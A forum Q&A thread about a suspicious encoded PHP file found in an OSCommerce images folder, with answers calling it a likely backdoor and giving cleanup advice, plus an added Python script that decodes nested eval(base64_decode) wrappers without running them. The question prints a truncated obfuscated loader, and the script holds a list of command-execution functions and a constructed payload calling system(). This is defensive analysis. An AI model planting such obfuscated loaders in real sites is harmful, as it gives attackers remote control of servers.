
I was digging through the OSCommerce files on my site and found a file in the /images folder that I don't ever remember seeing before. I haven't checked the original install package, but I suspect this isn't a part of it.

The file is 27kb and called vidovic_pretty.php. It's encoded or compiled in some way, so the contents are unviewable (see below).

    <?eval(base64_decode("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7...

Running it displays a single html textbox and a button that says, “Check.”

Anyone have any ideas what it is or what it might do?

Thanks

5 Answers


  1. If you can provide the entire string within the base64_decode – Or, actually, instead of calling eval, call echo:

    <?php
    // Print the decoded source instead of executing it.
    echo base64_decode("JGs9M...");
    

    You'll be able to see what it does. But, typically, this is a signature of a backdoor/attacker, etc. I've seen this style before. And the fact it's in the images/ directory maybe means they were able to get something like photo.gif.php uploaded …

    Probably not good at all.

    Running it displays a single html textbox and a button that says, "Check."

    Does it post to a page? Maybe the page receives whatever is in the textbox and executes it via system(), exec(), etc….

  2. This is most likely something a hacker injected – encoded and minimized. You can echo the result of base64_decode(...) instead of evaluating it to see what it would try to perform. BTW, actually running it was probably a big mistake.

  3. I have absolutely no doubt in my mind that you have been hacked. You have discovered a backdoor and you must remove it immediately. These are often put in place by automated attack systems and then a hacker can come back at a later date and assume control over your server or use your server to break into web browsers that visit it. I have cleaned up hacks identical to this before. I'm surprised you aren't on Google's malware list; that is usually people's first indication.

    I really want to find out the PHP code that is being eval'ed. Can you post the full base64? Maybe split it up by newlines so it will fit.

  4. Definitely a baddie you got there. As others have pointed out, it most probably serves as a nice backdoor for the attacker to run arbitrary commands on your system.

    What you should, at a bare minimum, do is:

    • Notify your tech support and ask for them to find out what the attacker changed and when
    • If you are on a shared host, move to a dedicated server (or at least a VPS)
    • Back up your data, verifying it’s clean in the process
    • Roll back to a backup made before the box has been compromised
    • Apply any and all security patches to the software you have been running, the OS, etc.
    • Reinstall your scripts then re-import the clean data
  5. In my PHP framework, I do not allow files to be uploaded that Apache might know how to execute upon retrieval.

    If you must print out a thing like this, do it in a CLI version of PHP, don't send it to your browser! It might also include something that your browser will execute.

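Answers 1 and 5 both come down to the same thing: decode the blob, don't run it, and don't let a browser render the result. Below is an added example (not from the original thread or from OSCommerce) of doing that statically in Python: it peels nested `eval(base64_decode("..."))` wrappers off a PHP file without ever executing PHP, then reports which command-execution functions the innermost layer calls. The sample file it analyses is constructed here to mimic the shape of the file in the question; it is not the decoded content of the real one.

```python
import base64
import re

# eval(base64_decode("...")) with either quote style; the PHP open tag
# in front of it (short "<?" or "<?php") is irrelevant to the match.
EVAL_B64 = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)',
    re.IGNORECASE,
)

# Functions whose presence in a decoded layer means "this can run commands".
SUSPICIOUS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")


def unwrap_layers(source: str, max_layers: int = 10) -> list[str]:
    """Return [original, layer1, layer2, ...] by decoding, never evaluating.

    Stops when no further eval(base64_decode(...)) wrapper is found, when the
    blob is not valid base64, or after max_layers (guards against bombs)."""
    layers = [source]
    for _ in range(max_layers):
        m = EVAL_B64.search(layers[-1])
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group(1))  # blobs are often split over lines
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        layers.append(decoded.decode("utf-8", errors="replace"))
    return layers


def suspicious_calls(code: str) -> list[str]:
    """Names from SUSPICIOUS that are called in the given PHP source."""
    return [n for n in SUSPICIOUS if re.search(r"\b%s\s*\(" % re.escape(n), code, re.I)]


# Constructed sample: two wrapper layers around a short PHP payload (hypothetical).
INNER = '$k=143;$m=explode(";","234;253;253");system($cmd);'
_LAYER1 = 'eval(base64_decode("%s"));' % base64.b64encode(INNER.encode()).decode()
SAMPLE_FILE = '<?eval(base64_decode("%s"));' % base64.b64encode(_LAYER1.encode()).decode()

if __name__ == "__main__":
    for i, layer in enumerate(unwrap_layers(SAMPLE_FILE)):
        print(f"--- layer {i} ---\n{layer}")
    print("command execution via:", suspicious_calls(unwrap_layers(SAMPLE_FILE)[-1]))
```

Run it on the real file with `unwrap_layers(open("vidovic_pretty.php").read())`; the decoded layers are plain text for a text editor, not something to open in a browser.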